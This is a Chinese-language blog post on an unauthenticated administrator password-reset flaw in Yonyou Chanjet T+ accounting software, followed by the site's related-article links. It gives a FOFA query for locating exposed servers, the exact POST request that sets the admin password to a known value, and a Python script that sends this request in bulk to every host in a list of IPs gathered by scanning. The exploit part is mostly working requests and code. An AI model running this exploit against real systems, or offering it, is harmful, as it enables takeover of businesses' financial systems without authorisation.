0x10 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞

已于 2024-10-01 22:59:33 修改
阅读量230 收藏 2
点赞数 1
分类专栏: 漏洞库 文章标签: 安全 网络 web安全
于 2024-10-01 22:57:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263566/article/details/142675766
版权

参考:

免责声明

欢迎访问我的博客。以下内容仅供教育和信息用途:

  1. 合法性:我不支持或鼓励非法活动。请确保遵守法律法规。
  2. 信息准确性:尽管我尽力提供准确的信息,但不保证其完全准确或适用。使用前请自行验证。
  3. 风险提示:技术使用可能带来风险,如系统损坏或数据丢失。请谨慎使用,并自行承担风险。
  4. 责任限制:我对使用博客内容产生的任何损害不承担责任
  5. 第三方链接:博客中的链接仅为方便用户,内容不由我负责。

使用本博客即表示您同意以上条款。如果有疑问,请联系我。

漏洞描述

用友畅捷通T+的 RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过该漏洞修改管理员账号密码,从而登录后台。

漏洞影响

  • 用友畅捷通T+ 系统的安全性受到威胁,攻击者可能获取管理员权限。

网络测绘

网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

app="畅捷通-TPlus"

漏洞复现

登录页面

验证POC, 重置账号密码为 admin/123qwe

POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd

{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}

注入成功的回显

编写脚本进行批量复现 

可以先编写个爬虫脚本收集fofa上的ip信息:Python教程:如何用Python编写FOFA爬虫获取信息?_fofa python-CSDN博客

批量验证url

import requests
import json

# 设置请求头,模拟浏览器(不然有些网站无法正常获取到响应信息)
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
    'Content-Type': 'application/json',  # 指定内容类型为 JSON
}

# 从本地的 ip.txt 文件中读取 URL
with open('ip.txt', 'r') as file:
    urls = file.readlines()

# 要发送的 JSON 数据
data = {
    "pwdNew": "46f94c8de14fb36680850768ff1b7f2a"
}

# 遍历每个 URL 并发送请求
for url in urls:
    url = url.strip()  # 去掉首尾空白字符
    url += "/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"

    if url:  # 确保 URL 不为空
        try:
            # 设置请求超时时间为 10 秒
            response = requests.post(url, headers=headers, data=json.dumps(data), timeout=10)
            print(f'URL: {url} - 状态码: {response.status_code}')

            # 检查状态码和响应内容
            if response.status_code == 200 and "value" in response.text:
                print('请求成功: 响应内容:', response.text)
            else:
                print('请求失败: 状态码为', response.status_code)

        except requests.exceptions.RequestException as e:
            print(f'请求 {url} 时出现错误: {e}')

手动验证一下账号,登录成功

狗蛋的博客之旅
关注
专栏目录
捷通T+ InitServerInfo.aspx SQL漏洞复现
0xSec
03-13 924
由于捷通T+的InitServerInfo.aspx接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
【1day】复现用友捷通T+前台命令执行漏洞
记录并分享学习安全的知识点..
07-07 720
捷通T+是一款主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友 捷通T+ GetStoreWarehouseByStore 存在 .net反序列化漏洞,导致远程命令执行,控制服务器
(附nuclei 批量验证文件)用友 捷通T+ RecoverPassword.aspx 管理员密码修改漏洞(QVD-2023-20016)
nglj9527的博客
05-29 387
用友 捷通T+ RecoverPassword.aspx 管理员密码修改漏洞(QVD-2023-20016)复现。
漏洞复现】用友捷通TPlus GetStoreWarehouseByStore .net反序列化漏洞
qq_34780861的博客
04-08 479
捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。该漏洞属于.net反序列化场景中的 JavaScriptSerializer反序列化。
用友OA检测工具-fupo_for_yonyou
siu~
08-16 467
用友漏洞检测,持续更新漏洞检测模块
用友OA检测工具-fupo_for_yonyou,附下载链接。
白帽子黑客SuperherRo
09-22 210
用友OA检测工具-fupo_for_yonyou
ecshop 后台管理员密码忘记该怎么办?ecshop恢复管理员密码的方法
ecshop数据采集发布接口,zencart,lightinthebox,shopex 采集,快客
07-11 3705
第一种方法就是利用PHPMYADMIN登录ECSHOP的MYSQL数据库,我们进去以后找到:ecs_admin_user 这个表,把admin管理员密码改一下,我们可以把密码改成默认的admin,在这里我们需要admin的MD5码391ae220829fc108b2f8471819fe6632,改成这个以后,然后我们打款ECSHOP的后台,用户名和密码都输入admin888就可以登录了。
android 获取用户名和密码,如何通过Android中的电子邮件地址获取用户名和密码
weixin_34355977的博客
05-29 614
我试图通过电子邮件地址获取用户名和密码并将其作为电子邮件发送[密码恢复] ..... 我可以检查通过电子邮件用户,但现在我需要得到由他/她之前所提供的电子邮件的用户名和密码....如何通过Android中的电子邮件地址获取用户名和密码这里是我的DB_Classpublic boolean getEmail(String emailNo) throws SQLException //pass the...
ECSHOP忘记密码的2种处理方法恢复管理权限
wangmj518的专栏
01-18 1258
在我们使用ECSHOP的时候有的时候由于粗心,忘记后台管理员密码的时候也经常常见,这给我们带来不少问题,那么怎么来解决这个问题呢?方法有二:     首先,第一种方法就是利用PHPMYADMIN登录ECSHOP的MYSQL数据库,我们进去以后找到:ecs_admin_user 这个表,把admin管理员密码改一下,我们可以把密码改成默认的admin,在这里我们需要admin的MD5码 2123
《系统密码恢复工具》(Recover My Password Unlimited Edition)v2.0
weixin_34150503的博客
05-24 141
下载地址:http://www.verycd.com/topics/2893478/ Recover My Password 是简单易用的Windowns系统密码重置工具,可以将管理员密码清除。如果你忘记了密码或者电脑被锁定了无法登陆,那么你可以在USB设备或者CD上安装Lazesoft Recover My Password 并从USB设备或CD启动,即可清除系统设置的登陆密码。 支持的Wi...
FlexWiki-开源
04-22
10. **RecoverPassword.aspx**:帮助用户找回忘记的密码,通过邮箱验证或安全问题来恢复账户。 FlexWiki的这些组件共同构建了一个强大的协作平台,使得用户能够方便地创建、管理和分享知识。由于是开源软件,开发者...
股票私募网站源码程式系统
11-09
`PassWordMobile.aspx` 和 `PassWordMethod.aspx` 可能涉及到移动设备上的密码修改和验证方法选择。这些页面可能与`RecoverPassword.aspx`类似,允许用户在手机上重置或更改密码,确保账户的安全性。 `dredgeInfo....
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 762
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 690
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 576
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
浅谈软件安全开发的重要性及安全开发实践
esion23011的专栏
09-25 515
*制定安全开发可量化管理流程**:为了确保软件开发过程的安全性,企业应建立一套可量化、可追溯的安全开发管理流程。通过建立企业安全战略、制定安全开发管理流程、提高安全开发意识以及实施一系列安全开发实践措施,企业可以构建安全可靠的信息系统,为企业的持续发展和创新提供有力保障。**明确安全需求**:基于攻击面分析的结果,企业应明确软件系统的安全需求。**建立企业安全战略**:企业应根据国家法律法规要求、自身业务特点及软件应用系统的实际情况,制定符合自身需求的安全发展战略。#### 企业要怎么进行安全开发?
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
最新发布
weixin_64446270的博客
09-27 1356
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
网络编程(5)——模拟伪闭包实现连接的安全回收
m0_63086198的博客
09-26 1075
new_session通过bind绑定时,new_session的计数就会加一,所以在bind后,new_session的生命周期和新构造函数的生命周期相同,因为新生成的函数对象引用了new_session(new_session通过值传递的方式被复制构造函数使用)。,但是通过bind操作,将new_session作为数值传递给bind函数,而bind函数返回的函数对象内部引用了该new_session所以引用计数增加1,这样保证了new_session不会被释放。今天学习如何通过C11智能指针构造伪。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 689
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

狗蛋的博客之旅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值